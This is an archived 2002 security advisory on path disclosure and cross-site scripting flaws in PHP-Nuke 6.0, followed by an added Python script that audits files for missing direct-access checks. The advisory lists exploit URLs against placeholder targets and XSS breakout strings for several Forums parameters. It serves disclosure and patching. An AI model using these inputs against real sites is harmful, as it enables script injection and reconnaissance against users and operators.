View Full Version : PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting



Frog Man
16/12/02, 20:46
Information :
°°°°°°°°°°°°°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS


Development :
°°°°°°°°°°°°°°°
Most of PHP-Nuke's files are included by modules.php or
index.php. To prevent direct access, PHP-Nuke uses two kinds of protection.
The first one (e.g. in modules/Downloads/index.php) is :
---------------------------------------------------
if (!eregi("modules.php", $PHP_SELF)) {
    die ("You can't access this file directly...");
}
---------------------------------------------------

The second one (e.g. footer.php ) :
------------------------------------
if (eregi("footer.php",$PHP_SELF)) {
    Header("Location: index.php");
    die();
}
------------------------------------

Some files lack these safety measures and have security holes.

Exploits :
°°°°°°°°°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org .


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n
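
An added example (not part of the post above and not PHP-Nuke code): a Python audit script that walks a PHP-Nuke tree and reports which .php files carry neither of the two direct-access checks quoted in the post, so they can be reviewed first. The function names, the constructed sample tree and the choice to accept index.php as well as modules.php in the first check are assumptions; the match is a textual heuristic, so "unguarded" means "review this file", not "vulnerable".

```python
import re
import tempfile
from pathlib import Path

# Matches both guard shapes quoted in the advisory:
#   if (!eregi("modules.php", $PHP_SELF)) { die(...); }
#   if (eregi("footer.php",$PHP_SELF)) { Header(...); die(); }
GUARD_RE = re.compile(
    r"""if\s*\(\s*(?P<neg>!?)\s*eregi\s*\(\s*["'](?P<name>[^"']+)["']\s*,\s*\$PHP_SELF""",
    re.IGNORECASE,
)
ENTRY_POINTS = {"modules.php", "index.php"}  # assumption: either including script may be tested

def classify(path: Path) -> str:
    """Return 'entry-point-check', 'self-name-check' or 'unguarded' for one file."""
    source = path.read_text(encoding="latin-1")
    for m in GUARD_RE.finditer(source):
        name = m.group("name").lower()
        if m.group("neg") and name in ENTRY_POINTS:
            return "entry-point-check"   # first form: die unless reached via modules.php
        if not m.group("neg") and name == path.name.lower():
            return "self-name-check"     # second form: redirect when requested directly
    return "unguarded"

def audit(root: Path) -> dict:
    """Map every .php file under root (relative POSIX path) to its guard class."""
    return {p.relative_to(root).as_posix(): classify(p) for p in sorted(root.rglob("*.php"))}

def build_sample_tree(root: Path) -> None:
    """Write constructed sample files (illustrative bodies, not PHP-Nuke source)."""
    samples = {
        "modules/Downloads/index.php":
            '<?php\nif (!eregi("modules.php", $PHP_SELF)) {\n    die ("no direct access");\n}\n',
        "footer.php":
            '<?php\nif (eregi("footer.php",$PHP_SELF)) {\n    Header("Location: index.php");\n    die();\n}\n',
        "modules/Forums/bb_smilies.php":
            '<?php\necho "<title>$sitename</title>";\n',
    }
    for rel, body in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="latin-1")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        for rel, verdict in audit(Path(tmp)).items():
            print(f"{verdict:18} {rel}")
```

Files reported as unguarded should then be checked for variables that are echoed or used in include paths without being initialised or escaped.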


